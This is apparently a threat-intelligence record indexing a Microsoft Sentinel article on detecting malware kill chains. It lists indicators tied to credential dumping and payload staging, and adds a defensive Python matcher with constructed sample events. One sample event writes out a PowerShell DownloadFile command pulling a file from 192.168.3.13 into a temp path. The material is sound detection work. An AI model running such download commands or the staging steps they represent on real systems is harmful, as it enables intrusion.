Detecting malware kill chains with Defender and Microsoft Sentinel
Common Information

Type                   Value
UUID                   d6bf6785-1e7c-4e30-b241-61d2dd29623e
Fingerprint            f2058a59eff75853
Analysis status        DONE
Considered CTI value   0
Text language          
Published              Feb. 28, 2022, 8:51 p.m.
Added to db            Sept. 26, 2022, 9:34 a.m.
Last updated           Nov. 17, 2024, 10:40 p.m.
Headline               Microsoft Sentinel 101
Title                  Detecting malware kill chains with Defender and Microsoft Sentinel
Detected Hints/Tags/Attributes   62/2/20
Attributes

Type     #Events   Value
Domain   1         trustsecpro.com
Domain   12        whatismyip.com
Domain   1         confluence.novus.ua
File     62        whoami.exe
File     13        logs.dat
File     2126      cmd.exe
File     1         email.jpeg
File     2         sys.tmp
File     2         postgresql.exe
File     226       certutil.exe
File     27        c:\windows\system32\comsvcs.dll
File     1         c:\asm\appdata\local\microsoft\windows\winupd.log
File     69        comsvcs.dll
File     478       lsass.exe
File     1         text.ps1
File     1         gp.ps1
File     2         link.ps1
IPv4     1         192.168.3.13
IPv4     1441      127.0.0.1
Url      1         http://192.168.3.13/email.jpeg’,’csidl_system_drive\temp\sys.tmp1

The CTI Value column of this table is empty for every attribute in the record. The Url value is an extraction artifact: the quoted argument that followed the URL in the source text was glued onto it.
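The attribute table above is raw extractor output, and two things matter before it is used for detection: the Url value carries the next quoted argument glued onto it, and indicators such as cmd.exe, lsass.exe, certutil.exe and 127.0.0.1 are so common (see the #Events column) that they cannot alert on their own. The following Python is an added example, not code from the record or from the Sentinel 101 article it indexes. It copies the record's indicators, cleans the Url, ranks each indicator by its event count, and matches constructed endpoint events against them. The event schema (image, command_line, dest_ip, dest_host), the sample events and the threshold of 100 events for "generic" are assumptions of this example.

```python
"""Added example (not part of the CTI record): match the record's attribute table
against constructed endpoint events and down-rank generic indicators."""
import ipaddress
import ntpath
import re

# (type, #Events, value) copied from the record's attribute table.
INDICATORS = [
    ("Domain", 1, "trustsecpro.com"),
    ("Domain", 12, "whatismyip.com"),
    ("Domain", 1, "confluence.novus.ua"),
    ("File", 62, "whoami.exe"),
    ("File", 13, "logs.dat"),
    ("File", 2126, "cmd.exe"),
    ("File", 1, "email.jpeg"),
    ("File", 2, "sys.tmp"),
    ("File", 2, "postgresql.exe"),
    ("File", 226, "certutil.exe"),
    ("File", 27, r"c:\windows\system32\comsvcs.dll"),
    ("File", 1, r"c:\asm\appdata\local\microsoft\windows\winupd.log"),
    ("File", 69, "comsvcs.dll"),
    ("File", 478, "lsass.exe"),
    ("File", 1, "text.ps1"),
    ("File", 1, "gp.ps1"),
    ("File", 2, "link.ps1"),
    ("IPv4", 1, "192.168.3.13"),
    ("IPv4", 1441, "127.0.0.1"),
    # Verbatim from the record: the extractor glued the next quoted argument onto the URL.
    ("Url", 1, r"http://192.168.3.13/email.jpeg’,’csidl_system_drive\temp\sys.tmp1"),
]

LOW_SIGNAL_EVENT_COUNT = 100  # assumption: an indicator seen this often is generic


def signal(kind, count, value):
    """Classify an indicator as 'high' or 'low' signal for stand-alone alerting."""
    if kind == "IPv4" and ipaddress.ip_address(value).is_loopback:
        return "low"  # 127.0.0.1 is local traffic, never an attacker address by itself
    return "low" if count >= LOW_SIGNAL_EVENT_COUNT else "high"


def clean_url(raw):
    """Keep only the URL part of a value, dropping any quote-glued trailing argument."""
    return re.split(r"[’'\",]", raw)[0]


def _tokens(cmdline):
    """Split a command line on whitespace, quotes, parentheses and commas."""
    return [t for t in re.split(r"[\s'\"(),’]+", cmdline) if t]


def match_event(event):
    """Return [(type, indicator, signal)] for every indicator present in one event."""
    cmdline = event.get("command_line", "")
    paths = [event.get("image", "")] + _tokens(cmdline)
    basenames = {ntpath.basename(p).lower() for p in paths if p}  # ntpath also splits on '/'
    fullpaths = {p.lower() for p in paths if p}
    urls = {u.lower() for u in re.findall(r"https?://[^\s'\"’,)]+", cmdline)}
    host = event.get("dest_host", "").lower()
    ip = event.get("dest_ip", "")
    hits = []
    for kind, count, value in INDICATORS:
        v = value.lower()
        if kind == "File":
            # A full-path indicator must match the whole path; a bare name matches any directory.
            matched = v in fullpaths if "\\" in v else v in basenames
        elif kind == "IPv4":
            matched = ip == value
        elif kind == "Domain":
            matched = host == v or host.endswith("." + v)
        elif kind == "Url":
            matched = clean_url(v) in urls
        else:
            matched = False
        if matched:
            hits.append((kind, value, signal(kind, count, value)))
    return hits


def low_signal_indicators():
    """Indicators from the record that should only contribute context, not alerts."""
    return [v for k, c, v in INDICATORS if signal(k, c, v) == "low"]


def scan(events):
    """Map each event id to its indicator hits."""
    return {e["id"]: match_event(e) for e in events}


# Constructed events for the demo; they are not taken from the page or from any real host.
SAMPLE_EVENTS = [
    {"id": "e1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://192.168.3.13/email.jpeg','C:\temp\sys.tmp')",
     "dest_ip": "192.168.3.13"},
    {"id": "e2", "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami.exe /all"},
    {"id": "e3", "image": r"C:\Windows\System32\curl.exe", "command_line": "curl.exe http://127.0.0.1:8080/",
     "dest_ip": "127.0.0.1"},
    {"id": "e4", "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs",
     "dest_host": "www.whatismyip.com"},
]

if __name__ == "__main__":
    print("low-signal on their own:", low_signal_indicators())
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        for kind, value, sig in hits:
            print(f"{event_id}: {kind} {value} [{sig}]")
```

Running it shows e1 matching four high-signal indicators at once (the download URL, its host, email.jpeg and sys.tmp), which is the kind of co-occurrence worth alerting on, while e2 and e3 only hit generic names and loopback traffic that need further context.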